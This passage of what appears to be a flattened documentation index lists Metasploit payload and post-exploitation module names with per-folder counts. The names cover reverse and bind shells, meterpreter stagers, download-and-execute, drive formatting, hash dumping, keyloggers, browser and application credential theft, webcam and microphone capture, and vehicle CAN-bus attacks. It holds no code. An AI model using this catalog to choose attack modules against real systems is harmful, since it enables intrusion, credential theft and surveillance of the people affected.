payload/linux/mipsle/meterpreter/reverse_tcp | . | shell (1) . | payload/linux/mipsle/shell/reverse_tcp | . 
| payload/linux/mipsle/exec | payload/linux/mipsle/meterpreter_reverse_http | payload/linux/mipsle/meterpreter_reverse_https | payload/linux/mipsle/meterpreter_reverse_tcp | payload/linux/mipsle/reboot | payload/linux/mipsle/shell_bind_tcp | payload/linux/mipsle/shell_reverse_tcp | . | ppc (6) . | payload/linux/ppc/meterpreter_reverse_http | payload/linux/ppc/meterpreter_reverse_https | payload/linux/ppc/meterpreter_reverse_tcp | payload/linux/ppc/shell_bind_tcp | payload/linux/ppc/shell_find_port | payload/linux/ppc/shell_reverse_tcp | . | ppc64 (3) . | payload/linux/ppc64/shell_bind_tcp | payload/linux/ppc64/shell_find_port | payload/linux/ppc64/shell_reverse_tcp | . | ppc64le (3) . | payload/linux/ppc64le/meterpreter_reverse_http | payload/linux/ppc64le/meterpreter_reverse_https | payload/linux/ppc64le/meterpreter_reverse_tcp | . | ppce500v2 (3) . | payload/linux/ppce500v2/meterpreter_reverse_http | payload/linux/ppce500v2/meterpreter_reverse_https | payload/linux/ppce500v2/meterpreter_reverse_tcp | . | x64 (18) . | meterpreter (3) . | payload/linux/x64/meterpreter/bind_tcp | payload/linux/x64/meterpreter/reverse_sctp | payload/linux/x64/meterpreter/reverse_tcp | . | shell (3) . | payload/linux/x64/shell/bind_tcp | payload/linux/x64/shell/reverse_sctp | payload/linux/x64/shell/reverse_tcp | . | payload/linux/x64/exec | payload/linux/x64/meterpreter_reverse_http | payload/linux/x64/meterpreter_reverse_https | payload/linux/x64/meterpreter_reverse_tcp | payload/linux/x64/pingback_bind_tcp | payload/linux/x64/pingback_reverse_tcp | payload/linux/x64/shell_bind_ipv6_tcp | payload/linux/x64/shell_bind_tcp | payload/linux/x64/shell_bind_tcp_random_port | payload/linux/x64/shell_find_port | payload/linux/x64/shell_reverse_ipv6_tcp | payload/linux/x64/shell_reverse_tcp | . | x86 (36) . | meterpreter (10) . 
| payload/linux/x86/meterpreter/bind_ipv6_tcp | payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid | payload/linux/x86/meterpreter/bind_nonx_tcp | payload/linux/x86/meterpreter/bind_tcp | payload/linux/x86/meterpreter/bind_tcp_uuid | payload/linux/x86/meterpreter/find_tag | payload/linux/x86/meterpreter/reverse_ipv6_tcp | payload/linux/x86/meterpreter/reverse_nonx_tcp | payload/linux/x86/meterpreter/reverse_tcp | payload/linux/x86/meterpreter/reverse_tcp_uuid | . | shell (10) . | payload/linux/x86/shell/bind_ipv6_tcp | payload/linux/x86/shell/bind_ipv6_tcp_uuid | payload/linux/x86/shell/bind_nonx_tcp | payload/linux/x86/shell/bind_tcp | payload/linux/x86/shell/bind_tcp_uuid | payload/linux/x86/shell/find_tag | payload/linux/x86/shell/reverse_ipv6_tcp | payload/linux/x86/shell/reverse_nonx_tcp | payload/linux/x86/shell/reverse_tcp | payload/linux/x86/shell/reverse_tcp_uuid | . | payload/linux/x86/adduser | payload/linux/x86/chmod | payload/linux/x86/exec | payload/linux/x86/meterpreter_reverse_http | payload/linux/x86/meterpreter_reverse_https | payload/linux/x86/meterpreter_reverse_tcp | payload/linux/x86/metsvc_bind_tcp | payload/linux/x86/metsvc_reverse_tcp | payload/linux/x86/read_file | payload/linux/x86/shell_bind_ipv6_tcp | payload/linux/x86/shell_bind_tcp | payload/linux/x86/shell_bind_tcp_random_port | payload/linux/x86/shell_find_port | payload/linux/x86/shell_find_tag | payload/linux/x86/shell_reverse_tcp | payload/linux/x86/shell_reverse_tcp_ipv6 | . | zarch (3) . | payload/linux/zarch/meterpreter_reverse_http | payload/linux/zarch/meterpreter_reverse_https | payload/linux/zarch/meterpreter_reverse_tcp | . | . | mainframe (1) . | payload/mainframe/shell_reverse_tcp | . | multi (2) . | meterpreter (2) . | payload/multi/meterpreter/reverse_http | payload/multi/meterpreter/reverse_https | . | . | netware (1) . | shell (1) . | payload/netware/shell/reverse_tcp | . | . | nodejs (3) . 
| payload/nodejs/shell_bind_tcp | payload/nodejs/shell_reverse_tcp | payload/nodejs/shell_reverse_tcp_ssl | . | osx (45) . | aarch64 (7) . | meterpreter (1) . | payload/osx/aarch64/meterpreter/reverse_tcp | . | payload/osx/aarch64/exec | payload/osx/aarch64/meterpreter_reverse_http | payload/osx/aarch64/meterpreter_reverse_https | payload/osx/aarch64/meterpreter_reverse_tcp | payload/osx/aarch64/shell_bind_tcp | payload/osx/aarch64/shell_reverse_tcp | . | armle (7) . | execute (2) . | payload/osx/armle/execute/bind_tcp | payload/osx/armle/execute/reverse_tcp | . | shell (2) . | payload/osx/armle/shell/bind_tcp | payload/osx/armle/shell/reverse_tcp | . | payload/osx/armle/shell_bind_tcp | payload/osx/armle/shell_reverse_tcp | payload/osx/armle/vibrate | . | ppc (5) . | shell (3) . | payload/osx/ppc/shell/bind_tcp | payload/osx/ppc/shell/find_tag | payload/osx/ppc/shell/reverse_tcp | . | payload/osx/ppc/shell_bind_tcp | payload/osx/ppc/shell_reverse_tcp | . | x64 (14) . | dupandexecve (3) . | payload/osx/x64/dupandexecve/bind_tcp | payload/osx/x64/dupandexecve/reverse_tcp | payload/osx/x64/dupandexecve/reverse_tcp_uuid | . | meterpreter (3) . | payload/osx/x64/meterpreter/bind_tcp | payload/osx/x64/meterpreter/reverse_tcp | payload/osx/x64/meterpreter/reverse_tcp_uuid | . | payload/osx/x64/exec | payload/osx/x64/meterpreter_reverse_http | payload/osx/x64/meterpreter_reverse_https | payload/osx/x64/meterpreter_reverse_tcp | payload/osx/x64/say | payload/osx/x64/shell_bind_tcp | payload/osx/x64/shell_find_tag | payload/osx/x64/shell_reverse_tcp | . | x86 (12) . | bundleinject (2) . | payload/osx/x86/bundleinject/bind_tcp | payload/osx/x86/bundleinject/reverse_tcp | . | isight (2) . | payload/osx/x86/isight/bind_tcp | payload/osx/x86/isight/reverse_tcp | . | vforkshell (2) . | payload/osx/x86/vforkshell/bind_tcp | payload/osx/x86/vforkshell/reverse_tcp | . 
| payload/osx/x86/exec | payload/osx/x86/shell_bind_tcp | payload/osx/x86/shell_find_port | payload/osx/x86/shell_reverse_tcp | payload/osx/x86/vforkshell_bind_tcp | payload/osx/x86/vforkshell_reverse_tcp | . | . | php (16) . | meterpreter (6) . | payload/php/meterpreter/bind_tcp | payload/php/meterpreter/bind_tcp_ipv6 | payload/php/meterpreter/bind_tcp_ipv6_uuid | payload/php/meterpreter/bind_tcp_uuid | payload/php/meterpreter/reverse_tcp | payload/php/meterpreter/reverse_tcp_uuid | . | payload/php/bind_perl | payload/php/bind_perl_ipv6 | payload/php/bind_php | payload/php/bind_php_ipv6 | payload/php/download_exec | payload/php/exec | payload/php/meterpreter_reverse_tcp | payload/php/reverse_perl | payload/php/reverse_php | payload/php/shell_findsock | . | python (18) . | meterpreter (7) . | payload/python/meterpreter/bind_tcp | payload/python/meterpreter/bind_tcp_uuid | payload/python/meterpreter/reverse_http | payload/python/meterpreter/reverse_https | payload/python/meterpreter/reverse_tcp | payload/python/meterpreter/reverse_tcp_ssl | payload/python/meterpreter/reverse_tcp_uuid | . | payload/python/meterpreter_bind_tcp | payload/python/meterpreter_reverse_http | payload/python/meterpreter_reverse_https | payload/python/meterpreter_reverse_tcp | payload/python/pingback_bind_tcp | payload/python/pingback_reverse_tcp | payload/python/shell_bind_tcp | payload/python/shell_reverse_sctp | payload/python/shell_reverse_tcp | payload/python/shell_reverse_tcp_ssl | payload/python/shell_reverse_udp | . | r (2) . | payload/r/shell_bind_tcp | payload/r/shell_reverse_tcp | . | ruby (6) . | payload/ruby/pingback_bind_tcp | payload/ruby/pingback_reverse_tcp | payload/ruby/shell_bind_tcp | payload/ruby/shell_bind_tcp_ipv6 | payload/ruby/shell_reverse_tcp | payload/ruby/shell_reverse_tcp_ssl | . | solaris (6) . | sparc (3) . | payload/solaris/sparc/shell_bind_tcp | payload/solaris/sparc/shell_find_port | payload/solaris/sparc/shell_reverse_tcp | . | x86 (3) . 
| payload/solaris/x86/shell_bind_tcp | payload/solaris/x86/shell_find_port | payload/solaris/x86/shell_reverse_tcp | . | . | tty (1) . | unix (1) . | payload/tty/unix/interact | . | . | windows (301) . | custom (28) . | payload/windows/custom/bind_hidden_ipknock_tcp | payload/windows/custom/bind_hidden_tcp | payload/windows/custom/bind_ipv6_tcp | payload/windows/custom/bind_ipv6_tcp_uuid | payload/windows/custom/bind_named_pipe | payload/windows/custom/bind_nonx_tcp | payload/windows/custom/bind_tcp | payload/windows/custom/bind_tcp_rc4 | payload/windows/custom/bind_tcp_uuid | payload/windows/custom/find_tag | payload/windows/custom/reverse_hop_http | payload/windows/custom/reverse_http | payload/windows/custom/reverse_http_proxy_pstore | payload/windows/custom/reverse_https | payload/windows/custom/reverse_https_proxy | payload/windows/custom/reverse_ipv6_tcp | payload/windows/custom/reverse_named_pipe | payload/windows/custom/reverse_nonx_tcp | payload/windows/custom/reverse_ord_tcp | payload/windows/custom/reverse_tcp | payload/windows/custom/reverse_tcp_allports | payload/windows/custom/reverse_tcp_dns | payload/windows/custom/reverse_tcp_rc4 | payload/windows/custom/reverse_tcp_rc4_dns | payload/windows/custom/reverse_tcp_uuid | payload/windows/custom/reverse_udp | payload/windows/custom/reverse_winhttp | payload/windows/custom/reverse_winhttps | . | dllinject (23) . 
| payload/windows/dllinject/bind_hidden_ipknock_tcp | payload/windows/dllinject/bind_hidden_tcp | payload/windows/dllinject/bind_ipv6_tcp | payload/windows/dllinject/bind_ipv6_tcp_uuid | payload/windows/dllinject/bind_named_pipe | payload/windows/dllinject/bind_nonx_tcp | payload/windows/dllinject/bind_tcp | payload/windows/dllinject/bind_tcp_rc4 | payload/windows/dllinject/bind_tcp_uuid | payload/windows/dllinject/find_tag | payload/windows/dllinject/reverse_hop_http | payload/windows/dllinject/reverse_http | payload/windows/dllinject/reverse_http_proxy_pstore | payload/windows/dllinject/reverse_ipv6_tcp | payload/windows/dllinject/reverse_nonx_tcp | payload/windows/dllinject/reverse_ord_tcp | payload/windows/dllinject/reverse_tcp | payload/windows/dllinject/reverse_tcp_allports | payload/windows/dllinject/reverse_tcp_dns | payload/windows/dllinject/reverse_tcp_rc4 | payload/windows/dllinject/reverse_tcp_rc4_dns | payload/windows/dllinject/reverse_tcp_uuid | payload/windows/dllinject/reverse_winhttp | . | meterpreter (27) . 
| payload/windows/meterpreter/bind_hidden_ipknock_tcp | payload/windows/meterpreter/bind_hidden_tcp | payload/windows/meterpreter/bind_ipv6_tcp | payload/windows/meterpreter/bind_ipv6_tcp_uuid | payload/windows/meterpreter/bind_named_pipe | payload/windows/meterpreter/bind_nonx_tcp | payload/windows/meterpreter/bind_tcp | payload/windows/meterpreter/bind_tcp_rc4 | payload/windows/meterpreter/bind_tcp_uuid | payload/windows/meterpreter/find_tag | payload/windows/meterpreter/reverse_hop_http | payload/windows/meterpreter/reverse_http | payload/windows/meterpreter/reverse_http_proxy_pstore | payload/windows/meterpreter/reverse_https | payload/windows/meterpreter/reverse_https_proxy | payload/windows/meterpreter/reverse_ipv6_tcp | payload/windows/meterpreter/reverse_named_pipe | payload/windows/meterpreter/reverse_nonx_tcp | payload/windows/meterpreter/reverse_ord_tcp | payload/windows/meterpreter/reverse_tcp | payload/windows/meterpreter/reverse_tcp_allports | payload/windows/meterpreter/reverse_tcp_dns | payload/windows/meterpreter/reverse_tcp_rc4 | payload/windows/meterpreter/reverse_tcp_rc4_dns | payload/windows/meterpreter/reverse_tcp_uuid | payload/windows/meterpreter/reverse_winhttp | payload/windows/meterpreter/reverse_winhttps | . | patchupdllinject (19) . 
| payload/windows/patchupdllinject/bind_hidden_ipknock_tcp | payload/windows/patchupdllinject/bind_hidden_tcp | payload/windows/patchupdllinject/bind_ipv6_tcp | payload/windows/patchupdllinject/bind_ipv6_tcp_uuid | payload/windows/patchupdllinject/bind_named_pipe | payload/windows/patchupdllinject/bind_nonx_tcp | payload/windows/patchupdllinject/bind_tcp | payload/windows/patchupdllinject/bind_tcp_rc4 | payload/windows/patchupdllinject/bind_tcp_uuid | payload/windows/patchupdllinject/find_tag | payload/windows/patchupdllinject/reverse_ipv6_tcp | payload/windows/patchupdllinject/reverse_nonx_tcp | payload/windows/patchupdllinject/reverse_ord_tcp | payload/windows/patchupdllinject/reverse_tcp | payload/windows/patchupdllinject/reverse_tcp_allports | payload/windows/patchupdllinject/reverse_tcp_dns | payload/windows/patchupdllinject/reverse_tcp_rc4 | payload/windows/patchupdllinject/reverse_tcp_rc4_dns | payload/windows/patchupdllinject/reverse_tcp_uuid | . | patchupmeterpreter (19) . | payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp | payload/windows/patchupmeterpreter/bind_hidden_tcp | payload/windows/patchupmeterpreter/bind_ipv6_tcp | payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid | payload/windows/patchupmeterpreter/bind_named_pipe | payload/windows/patchupmeterpreter/bind_nonx_tcp | payload/windows/patchupmeterpreter/bind_tcp | payload/windows/patchupmeterpreter/bind_tcp_rc4 | payload/windows/patchupmeterpreter/bind_tcp_uuid | payload/windows/patchupmeterpreter/find_tag | payload/windows/patchupmeterpreter/reverse_ipv6_tcp | payload/windows/patchupmeterpreter/reverse_nonx_tcp | payload/windows/patchupmeterpreter/reverse_ord_tcp | payload/windows/patchupmeterpreter/reverse_tcp | payload/windows/patchupmeterpreter/reverse_tcp_allports | payload/windows/patchupmeterpreter/reverse_tcp_dns | payload/windows/patchupmeterpreter/reverse_tcp_rc4 | payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns | payload/windows/patchupmeterpreter/reverse_tcp_uuid 
| . | peinject (20) . | payload/windows/peinject/bind_hidden_ipknock_tcp | payload/windows/peinject/bind_hidden_tcp | payload/windows/peinject/bind_ipv6_tcp | payload/windows/peinject/bind_ipv6_tcp_uuid | payload/windows/peinject/bind_named_pipe | payload/windows/peinject/bind_nonx_tcp | payload/windows/peinject/bind_tcp | payload/windows/peinject/bind_tcp_rc4 | payload/windows/peinject/bind_tcp_uuid | payload/windows/peinject/find_tag | payload/windows/peinject/reverse_ipv6_tcp | payload/windows/peinject/reverse_named_pipe | payload/windows/peinject/reverse_nonx_tcp | payload/windows/peinject/reverse_ord_tcp | payload/windows/peinject/reverse_tcp | payload/windows/peinject/reverse_tcp_allports | payload/windows/peinject/reverse_tcp_dns | payload/windows/peinject/reverse_tcp_rc4 | payload/windows/peinject/reverse_tcp_rc4_dns | payload/windows/peinject/reverse_tcp_uuid | . | shell (20) . | payload/windows/shell/bind_hidden_ipknock_tcp | payload/windows/shell/bind_hidden_tcp | payload/windows/shell/bind_ipv6_tcp | payload/windows/shell/bind_ipv6_tcp_uuid | payload/windows/shell/bind_named_pipe | payload/windows/shell/bind_nonx_tcp | payload/windows/shell/bind_tcp | payload/windows/shell/bind_tcp_rc4 | payload/windows/shell/bind_tcp_uuid | payload/windows/shell/find_tag | payload/windows/shell/reverse_ipv6_tcp | payload/windows/shell/reverse_nonx_tcp | payload/windows/shell/reverse_ord_tcp | payload/windows/shell/reverse_tcp | payload/windows/shell/reverse_tcp_allports | payload/windows/shell/reverse_tcp_dns | payload/windows/shell/reverse_tcp_rc4 | payload/windows/shell/reverse_tcp_rc4_dns | payload/windows/shell/reverse_tcp_uuid | payload/windows/shell/reverse_udp | . | upexec (20) . 
| payload/windows/upexec/bind_hidden_ipknock_tcp | payload/windows/upexec/bind_hidden_tcp | payload/windows/upexec/bind_ipv6_tcp | payload/windows/upexec/bind_ipv6_tcp_uuid | payload/windows/upexec/bind_named_pipe | payload/windows/upexec/bind_nonx_tcp | payload/windows/upexec/bind_tcp | payload/windows/upexec/bind_tcp_rc4 | payload/windows/upexec/bind_tcp_uuid | payload/windows/upexec/find_tag | payload/windows/upexec/reverse_ipv6_tcp | payload/windows/upexec/reverse_nonx_tcp | payload/windows/upexec/reverse_ord_tcp | payload/windows/upexec/reverse_tcp | payload/windows/upexec/reverse_tcp_allports | payload/windows/upexec/reverse_tcp_dns | payload/windows/upexec/reverse_tcp_rc4 | payload/windows/upexec/reverse_tcp_rc4_dns | payload/windows/upexec/reverse_tcp_uuid | payload/windows/upexec/reverse_udp | . | vncinject (23) . | payload/windows/vncinject/bind_hidden_ipknock_tcp | payload/windows/vncinject/bind_hidden_tcp | payload/windows/vncinject/bind_ipv6_tcp | payload/windows/vncinject/bind_ipv6_tcp_uuid | payload/windows/vncinject/bind_named_pipe | payload/windows/vncinject/bind_nonx_tcp | payload/windows/vncinject/bind_tcp | payload/windows/vncinject/bind_tcp_rc4 | payload/windows/vncinject/bind_tcp_uuid | payload/windows/vncinject/find_tag | payload/windows/vncinject/reverse_hop_http | payload/windows/vncinject/reverse_http | payload/windows/vncinject/reverse_http_proxy_pstore | payload/windows/vncinject/reverse_ipv6_tcp | payload/windows/vncinject/reverse_nonx_tcp | payload/windows/vncinject/reverse_ord_tcp | payload/windows/vncinject/reverse_tcp | payload/windows/vncinject/reverse_tcp_allports | payload/windows/vncinject/reverse_tcp_dns | payload/windows/vncinject/reverse_tcp_rc4 | payload/windows/vncinject/reverse_tcp_rc4_dns | payload/windows/vncinject/reverse_tcp_uuid | payload/windows/vncinject/reverse_winhttp | . | x64 (77) . | custom (14) . 
| payload/windows/x64/custom/bind_ipv6_tcp | payload/windows/x64/custom/bind_ipv6_tcp_uuid | payload/windows/x64/custom/bind_named_pipe | payload/windows/x64/custom/bind_tcp | payload/windows/x64/custom/bind_tcp_rc4 | payload/windows/x64/custom/bind_tcp_uuid | payload/windows/x64/custom/reverse_http | payload/windows/x64/custom/reverse_https | payload/windows/x64/custom/reverse_named_pipe | payload/windows/x64/custom/reverse_tcp | payload/windows/x64/custom/reverse_tcp_rc4 | payload/windows/x64/custom/reverse_tcp_uuid | payload/windows/x64/custom/reverse_winhttp | payload/windows/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/windows/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/windows/x64/meterpreter/bind_ipv6_tcp | payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid | payload/windows/x64/meterpreter/bind_named_pipe | payload/windows/x64/meterpreter/bind_tcp | payload/windows/x64/meterpreter/bind_tcp_rc4 | payload/windows/x64/meterpreter/bind_tcp_uuid | payload/windows/x64/meterpreter/reverse_http | payload/windows/x64/meterpreter/reverse_https | payload/windows/x64/meterpreter/reverse_named_pipe | payload/windows/x64/meterpreter/reverse_tcp | payload/windows/x64/meterpreter/reverse_tcp_rc4 | payload/windows/x64/meterpreter/reverse_tcp_uuid | payload/windows/x64/meterpreter/reverse_winhttp | payload/windows/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/windows/x64/peinject/bind_ipv6_tcp | payload/windows/x64/peinject/bind_ipv6_tcp_uuid | payload/windows/x64/peinject/bind_named_pipe | payload/windows/x64/peinject/bind_tcp | payload/windows/x64/peinject/bind_tcp_rc4 | payload/windows/x64/peinject/bind_tcp_uuid | payload/windows/x64/peinject/reverse_named_pipe | payload/windows/x64/peinject/reverse_tcp | payload/windows/x64/peinject/reverse_tcp_rc4 | payload/windows/x64/peinject/reverse_tcp_uuid | . | shell (9) . 
| payload/windows/x64/shell/bind_ipv6_tcp | payload/windows/x64/shell/bind_ipv6_tcp_uuid | payload/windows/x64/shell/bind_named_pipe | payload/windows/x64/shell/bind_tcp | payload/windows/x64/shell/bind_tcp_rc4 | payload/windows/x64/shell/bind_tcp_uuid | payload/windows/x64/shell/reverse_tcp | payload/windows/x64/shell/reverse_tcp_rc4 | payload/windows/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/windows/x64/vncinject/bind_ipv6_tcp | payload/windows/x64/vncinject/bind_ipv6_tcp_uuid | payload/windows/x64/vncinject/bind_named_pipe | payload/windows/x64/vncinject/bind_tcp | payload/windows/x64/vncinject/bind_tcp_rc4 | payload/windows/x64/vncinject/bind_tcp_uuid | payload/windows/x64/vncinject/reverse_http | payload/windows/x64/vncinject/reverse_https | payload/windows/x64/vncinject/reverse_tcp | payload/windows/x64/vncinject/reverse_tcp_rc4 | payload/windows/x64/vncinject/reverse_tcp_uuid | payload/windows/x64/vncinject/reverse_winhttp | payload/windows/x64/vncinject/reverse_winhttps | . | payload/windows/x64/encrypted_shell_reverse_tcp | payload/windows/x64/exec | payload/windows/x64/loadlibrary | payload/windows/x64/messagebox | payload/windows/x64/meterpreter_bind_named_pipe | payload/windows/x64/meterpreter_bind_tcp | payload/windows/x64/meterpreter_reverse_http | payload/windows/x64/meterpreter_reverse_https | payload/windows/x64/meterpreter_reverse_ipv6_tcp | payload/windows/x64/meterpreter_reverse_tcp | payload/windows/x64/pingback_reverse_tcp | payload/windows/x64/powershell_bind_tcp | payload/windows/x64/powershell_reverse_tcp | payload/windows/x64/powershell_reverse_tcp_ssl | payload/windows/x64/shell_bind_tcp | payload/windows/x64/shell_reverse_tcp | . 
| payload/windows/adduser | payload/windows/dns_txt_query_exec | payload/windows/download_exec | payload/windows/exec | payload/windows/format_all_drives | payload/windows/loadlibrary | payload/windows/messagebox | payload/windows/meterpreter_bind_named_pipe | payload/windows/meterpreter_bind_tcp | payload/windows/meterpreter_reverse_http | payload/windows/meterpreter_reverse_https | payload/windows/meterpreter_reverse_ipv6_tcp | payload/windows/meterpreter_reverse_tcp | payload/windows/metsvc_bind_tcp | payload/windows/metsvc_reverse_tcp | payload/windows/pingback_bind_tcp | payload/windows/pingback_reverse_tcp | payload/windows/powershell_bind_tcp | payload/windows/powershell_reverse_tcp | payload/windows/powershell_reverse_tcp_ssl | payload/windows/shell_bind_tcp | payload/windows/shell_bind_tcp_xpfw | payload/windows/shell_hidden_bind_tcp | payload/windows/shell_reverse_tcp | payload/windows/speak_pwned | . | . | post (430) . | aix (1) . | post/aix/hashdump | . | android (7) . | capture (1) . | post/android/capture/screen | . | gather (3) . | post/android/gather/hashdump | post/android/gather/sub_info | post/android/gather/wireless_ap | . | local (1) . | post/android/local/koffee | . | manage (2) . | post/android/manage/remove_lock | post/android/manage/remove_lock_root | . | . | apple_ios (2) . | gather (2) . | post/apple_ios/gather/ios_image_gather | post/apple_ios/gather/ios_text_gather | . | . | bsd (1) . | gather (1) . | post/bsd/gather/hashdump | . | . | firefox (5) . | gather (4) . | post/firefox/gather/cookies | post/firefox/gather/history | post/firefox/gather/passwords | post/firefox/gather/xss | . | manage (1) . | post/firefox/manage/webcam_chat | . | . | hardware (12) . | automotive (9) . 
| post/hardware/automotive/can_flood | post/hardware/automotive/canprobe | post/hardware/automotive/diagnostic_state | post/hardware/automotive/ecu_hard_reset | post/hardware/automotive/getvinfo | post/hardware/automotive/identifymodules | post/hardware/automotive/malibu_overheat | post/hardware/automotive/mazda_ic_mover | post/hardware/automotive/pdt | . | rftransceiver (2) . | post/hardware/rftransceiver/rfpwnon | post/hardware/rftransceiver/transmitter | . | zigbee (1) . | post/hardware/zigbee/zstumbler | . | . | linux (47) . | busybox (8) . | post/linux/busybox/enum_connections | post/linux/busybox/enum_hosts | post/linux/busybox/jailbreak | post/linux/busybox/ping_net | post/linux/busybox/set_dmz | post/linux/busybox/set_dns | post/linux/busybox/smb_share_root | post/linux/busybox/wget_exec | . | dos (1) . | post/linux/dos/xen_420_dos | . | gather (30) . | post/linux/gather/ansible | post/linux/gather/ansible_playbook_error_message_file_reader | post/linux/gather/apache_nifi_credentials | post/linux/gather/checkcontainer | post/linux/gather/checkvm | post/linux/gather/ecryptfs_creds | post/linux/gather/enum_commands | post/linux/gather/enum_configs | post/linux/gather/enum_containers | post/linux/gather/enum_nagios_xi | post/linux/gather/enum_network | post/linux/gather/enum_protections | post/linux/gather/enum_psk | post/linux/gather/enum_system | post/linux/gather/enum_users_history | post/linux/gather/f5_loot_mcp | post/linux/gather/gnome_commander_creds | post/linux/gather/gnome_keyring_dump | post/linux/gather/haserl_read | post/linux/gather/hashdump | post/linux/gather/manageengine_password_manager_creds | post/linux/gather/mimipenguin | post/linux/gather/mount_cifs_creds | post/linux/gather/openvpn_credentials | post/linux/gather/phpmyadmin_credsteal | post/linux/gather/pptpd_chap_secrets | post/linux/gather/puppet | post/linux/gather/rancher_audit_log_leak | post/linux/gather/tor_hiddenservices | post/linux/gather/vcenter_secrets_dump | . 
| manage (8) . | post/linux/manage/adduser | post/linux/manage/disable_clamav | post/linux/manage/dns_spoofing | post/linux/manage/download_exec | post/linux/manage/geutebruck_post_exp | post/linux/manage/iptables_removal | post/linux/manage/pseudo_shell | post/linux/manage/sshkey_persistence | . | . | multi (78) . | escalate (3) . | post/multi/escalate/aws_create_iam_user | post/multi/escalate/cups_root_file_read | post/multi/escalate/metasploit_pcaplog | . | gather (50) . | post/multi/gather/apple_ios_backup | post/multi/gather/aws_ec2_instance_metadata | post/multi/gather/aws_keys | post/multi/gather/azure_cli_creds | post/multi/gather/check_malware | post/multi/gather/chrome_cookies | post/multi/gather/dbeaver | post/multi/gather/dbvis_enum | post/multi/gather/dns_bruteforce | post/multi/gather/dns_reverse_lookup | post/multi/gather/dns_srv_lookup | post/multi/gather/docker_creds | post/multi/gather/electerm | post/multi/gather/enum_hexchat | post/multi/gather/enum_software_versions | post/multi/gather/enum_vbox | post/multi/gather/env | post/multi/gather/fetchmailrc_creds | post/multi/gather/filezilla_client_cred | post/multi/gather/find_vmx | post/multi/gather/firefox_creds | post/multi/gather/gpg_creds | post/multi/gather/grub_creds | post/multi/gather/irssi_creds | post/multi/gather/jboss_gather | post/multi/gather/jenkins_gather | post/multi/gather/lastpass_creds | post/multi/gather/maven_creds | post/multi/gather/memory_search | post/multi/gather/minio_client | post/multi/gather/multi_command | post/multi/gather/netrc_creds | post/multi/gather/pgpass_creds | post/multi/gather/pidgin_cred | post/multi/gather/ping_sweep | post/multi/gather/remmina_creds | post/multi/gather/resolve_hosts | post/multi/gather/rsyncd_creds | post/multi/gather/rubygems_api_key | post/multi/gather/run_console_rc_file | post/multi/gather/saltstack_salt | post/multi/gather/skype_enum | post/multi/gather/ssh_creds | post/multi/gather/thunderbird_creds | 
post/multi/gather/tomcat_gather | post/multi/gather/ubiquiti_unifi_backup | post/multi/gather/unix_cached_ad_hashes | post/multi/gather/unix_kerberos_tickets | post/multi/gather/wlan_geolocate | post/multi/gather/wowza_streaming_engine_creds | . | general (3) . | post/multi/general/close | post/multi/general/execute | post/multi/general/wall | . | manage (17) . | post/multi/manage/autoroute | post/multi/manage/dbvis_add_db_admin | post/multi/manage/dbvis_query | post/multi/manage/fileshare | post/multi/manage/hsts_eraser | post/multi/manage/multi_post | post/multi/manage/open | post/multi/manage/play_youtube | post/multi/manage/record_mic | post/multi/manage/screensaver | post/multi/manage/screenshare | post/multi/manage/set_wallpaper | post/multi/manage/shell_to_meterpreter | post/multi/manage/sudo | post/multi/manage/system_session | post/multi/manage/upload_exec | post/multi/manage/zip | . | recon (4) . | post/multi/recon/local_exploit_suggester | post/multi/recon/multiport_egress_traffic | post/multi/recon/reverse_lookup | post/multi/recon/sudo_commands | . | sap (1) . | post/multi/sap/smdagent_get_properties | . | . | networking (6) . | gather (6) . | post/networking/gather/enum_brocade | post/networking/gather/enum_cisco | post/networking/gather/enum_f5 | post/networking/gather/enum_juniper | post/networking/gather/enum_mikrotik | post/networking/gather/enum_vyos | . | . | osx (23) . | admin (1) . | post/osx/admin/say | . | capture (2) . | post/osx/capture/keylog_recorder | post/osx/capture/screen | . | escalate (1) . | post/osx/escalate/tccbypass | . | gather (14) . 
| post/osx/gather/apfs_encrypted_volume_passwd | post/osx/gather/autologin_password | post/osx/gather/enum_adium | post/osx/gather/enum_airport | post/osx/gather/enum_chicken_vnc_profile | post/osx/gather/enum_colloquy | post/osx/gather/enum_keychain | post/osx/gather/enum_messages | post/osx/gather/enum_osx | post/osx/gather/gitignore | post/osx/gather/hashdump | post/osx/gather/password_prompt_spoof | post/osx/gather/safari_lastsession | post/osx/gather/vnc_password_osx | . | manage (5) . | post/osx/manage/mount_share | post/osx/manage/record_mic | post/osx/manage/sonic_pi | post/osx/manage/vpn | post/osx/manage/webcam | . | . | solaris (6) . | escalate (2) . | post/solaris/escalate/pfexec | post/solaris/escalate/srsexec_readline | . | gather (4) . | post/solaris/gather/checkvm | post/solaris/gather/enum_packages | post/solaris/gather/enum_services | post/solaris/gather/hashdump | . | . | windows (242) . | capture (2) . | post/windows/capture/keylog_recorder | post/windows/capture/lockout_keylogger | . | escalate (6) . | post/windows/escalate/droplnk | post/windows/escalate/getsystem | post/windows/escalate/golden_ticket | post/windows/escalate/ms10_073_kbdlayout | post/windows/escalate/screen_unlock | post/windows/escalate/unmarshal_cmd_exec | . | gather (176) . | credentials (91) . 
| post/windows/gather/credentials/adi_irc | post/windows/gather/credentials/aim | post/windows/gather/credentials/avira_password | post/windows/gather/credentials/bulletproof_ftp | post/windows/gather/credentials/carotdav_ftp | post/windows/gather/credentials/chrome | post/windows/gather/credentials/comodo | post/windows/gather/credentials/coolnovo | post/windows/gather/credentials/coreftp | post/windows/gather/credentials/credential_collector | post/windows/gather/credentials/digsby | post/windows/gather/credentials/domain_hashdump | post/windows/gather/credentials/dynazip_log | post/windows/gather/credentials/dyndns | post/windows/gather/credentials/enum_cred_store | post/windows/gather/credentials/enum_laps | post/windows/gather/credentials/enum_picasa_pwds | post/windows/gather/credentials/epo_sql | post/windows/gather/credentials/filezilla_server | post/windows/gather/credentials/flashfxp | post/windows/gather/credentials/flock | post/windows/gather/credentials/ftpnavigator | post/windows/gather/credentials/ftpx | post/windows/gather/credentials/gadugadu | post/windows/gather/credentials/gpp | post/windows/gather/credentials/halloy_irc | post/windows/gather/credentials/heidisql | post/windows/gather/credentials/icq | post/windows/gather/credentials/idm | post/windows/gather/credentials/ie | post/windows/gather/credentials/imail | 